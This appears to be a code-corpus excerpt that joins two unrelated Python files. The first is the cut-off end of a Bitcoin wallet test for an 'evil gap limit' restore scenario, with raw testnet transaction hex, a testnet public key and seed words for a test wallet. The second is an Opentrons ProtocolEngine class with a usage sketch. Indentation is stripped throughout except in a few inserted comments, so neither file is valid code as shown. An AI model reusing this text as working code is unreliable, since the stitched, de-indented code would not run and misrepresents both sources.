"268fce617aaaa4847835c2212b984d7b7741fdab65de22813288341819bc5656": "010000000001014f1bdc64da8056d08f79db7f5348d1de55946e57aa7c8279499c703889b6e0fd0100000000fdffffff0260e316000000000016001445e9879cf7cd5b4a15df7ddcaf5c6dca0e1508bacc242600000000001600141bc12094a4475dcfbf24f9920dafddf9104ca95b02483045022100ae3618912f341fefee11b67e0047c47c88c4fa031561c3fafe993259dd14d846022056fa0a5b5d8a65942fa68bcc2f848fd71fa455ba42bc2d421b67eb49ba62aa4e01210394d8f4f06c2ea9c569eb050c897737a7315e7f2104d9b536b49968cc89a1f11033181400",
}
@classmethod
def create_wallet(cls):
ks = keystore.from_xpub('vpub5Vhmk4dEJKanDTTw6immKXa3thw45u3gbd1rPYjREB6viP13sVTWcH6kvbR2YeLtGjradr6SFLVt9PxWDBSrvw1Dc1nmd3oko3m24CQbfaJ')
# seed words: nephew work weather maze pyramid employ check permit garment scene kiwi smooth
w = WalletIntegrityHelper.create_standard_wallet(ks, gap_limit=20)
return w
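    # The wallet is created with gap_limit=20, but the history fed in below
    # touches HD index 25 (see the receive_history_callback calls), i.e. an
    # address beyond the gap limit: the "evil gap limit" scenario this class
    # is named for.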
@mock.patch.object(storage.WalletStorage, '_write')
def test_restoring_wallet_txorder1(self, mock_write):
w = self.create_wallet()
w.storage.put('stored_height', 1316917 + 100)
for txid in self.transactions:
tx = Transaction(self.transactions[txid])
w.transactions[tx.txid()] = tx
# txn A is an external incoming txn paying to addr (3) and (15)
# txn B is an external incoming txn paying to addr (4) and (25)
        # txn C is an internal transfer txn from addr (25) to addrs (1) and (25)
w.receive_history_callback('tb1qgh5c088he4d559wl0hw27hrdeg8p2z96pefn4q', # HD index 1
[('268fce617aaaa4847835c2212b984d7b7741fdab65de22813288341819bc5656', 1316917)],
{})
w.synchronize()
w.receive_history_callback('tb1qm0ejr6g964zt2jux5te7m9ds43n28hdsdz9ull', # HD index 3
[('511a35e240f4c8855de4c548dad932d03611a37e94e9203fdb6fc79911fe1dd4', 1316912)],
{})
w.synchronize()
w.receive_history_callback('tb1qj4pnq958k89zcem3342lhcgyz0rnmhkzl6x0cl', # HD index 4
[('fde0b68938709c4979827caa576e9455ded148537fdb798fd05680da64dc1b4f', 1316917)],
{})
w.synchronize()
w.receive_history_callback('tb1q3pyjwpm8wxgvquak240mprfhaydmkawcsl25je', # HD index 15
[('511a35e240f4c8855de4c548dad932d03611a37e94e9203fdb6fc79911fe1dd4', 1316912)],
{})
w.synchronize()
w.receive_history_callback('tb1qr0qjp99ygawul0eylxfqmt7alygye22mj33vej', # HD index 25
[('fde0b68938709c4979827caa576e9455ded148537fdb798fd05680da64dc1b4f', 1316917),
('268fce617aaaa4847835c2212b984d7b7741fdab65de22813288341819bc5656', 1316917)],
{})
w.synchronize()
self.assertEqual(9999788, sum(w.get_balance()))
|
py | 1a38c94f4f0005e636c340b5f0855f393323f447 | """ProtocolEngine class definition."""
from __future__ import annotations
from typing import Union
from opentrons.hardware_control.api import API as HardwareAPI
from opentrons.util.helpers import utc_now
from .errors import ProtocolEngineError, UnexpectedProtocolError
from .execution import CommandHandlers
from .resources import ResourceProviders
from .state import StateStore, StateView
from .commands import (
CommandRequestType,
CompletedCommandType,
FailedCommandType,
)
class ProtocolEngine:
"""Main ProtocolEngine class.
A ProtocolEngine instance holds the state of a protocol as it executes,
and manages calls to a command executor that actually implements the logic
of the commands themselves.
"""
state_store: StateStore
_handlers: CommandHandlers
@classmethod
async def create(cls, hardware: HardwareAPI) -> ProtocolEngine:
"""Create a ProtocolEngine instance."""
resources = ResourceProviders.create()
# TODO(mc, 2020-11-18): check short trash FF
# TODO(mc, 2020-11-18): consider moving into a StateStore.create factory
deck_def = await resources.deck_data.get_deck_definition()
fixed_labware = await resources.deck_data.get_deck_fixed_labware(deck_def)
state_store = StateStore(
deck_definition=deck_def,
deck_fixed_labware=fixed_labware
)
handlers = CommandHandlers.create(
resources=resources,
hardware=hardware,
state=StateView.create_view(state_store),
)
return cls(state_store=state_store, handlers=handlers)
def __init__(
self,
state_store: StateStore,
handlers: CommandHandlers,
) -> None:
"""Initialize a ProtocolEngine instance.
This constructor does not inject provider implementations. Prefer the
ProtocolEngine.create factory classmethod.
"""
self.state_store = state_store
self._handlers = handlers
async def execute_command(
self,
request: CommandRequestType,
command_id: str,
) -> Union[CompletedCommandType, FailedCommandType]:
"""Execute a command request, waiting for it to complete."""
cmd_impl = request.get_implementation()
created_at = utc_now()
cmd = cmd_impl.create_command(created_at).to_running(created_at)
done_cmd: Union[CompletedCommandType, FailedCommandType]
# store the command prior to execution
self.state_store.handle_command(cmd, command_id=command_id)
# execute the command
try:
result = await cmd_impl.execute(self._handlers)
completed_at = utc_now()
done_cmd = cmd.to_completed(result, completed_at)
except Exception as error:
failed_at = utc_now()
if not isinstance(error, ProtocolEngineError):
error = UnexpectedProtocolError(error)
done_cmd = cmd.to_failed(error, failed_at)
# store the done command
self.state_store.handle_command(done_cmd, command_id=command_id)
return done_cmd
def add_command(self, request: CommandRequestType) -> None:
"""Add a command to ProtocolEngine."""
# TODO(spp, 2020-05-13):
# Generate a UUID to be used as command_id for each command added.
raise NotImplementedError
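# --- Usage sketch (illustrative only; not part of the original module) ---
# A minimal example of the intended flow, per the docstrings above: build the
# engine with the ProtocolEngine.create factory (preferred over calling the
# constructor directly), then drive a single command to completion. The
# `hardware` argument must be a real HardwareAPI and `request` a concrete
# CommandRequestType; where those come from, and the "command-1" id, are
# assumptions of this sketch, not something this module defines.
async def _example_execute_one_command(
    hardware: HardwareAPI,
    request: CommandRequestType,
) -> Union[CompletedCommandType, FailedCommandType]:
    engine = await ProtocolEngine.create(hardware=hardware)
    # execute_command stores the running command, executes it, and stores the
    # completed or failed result in engine.state_store before returning it
    return await engine.execute_command(request, command_id="command-1")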
|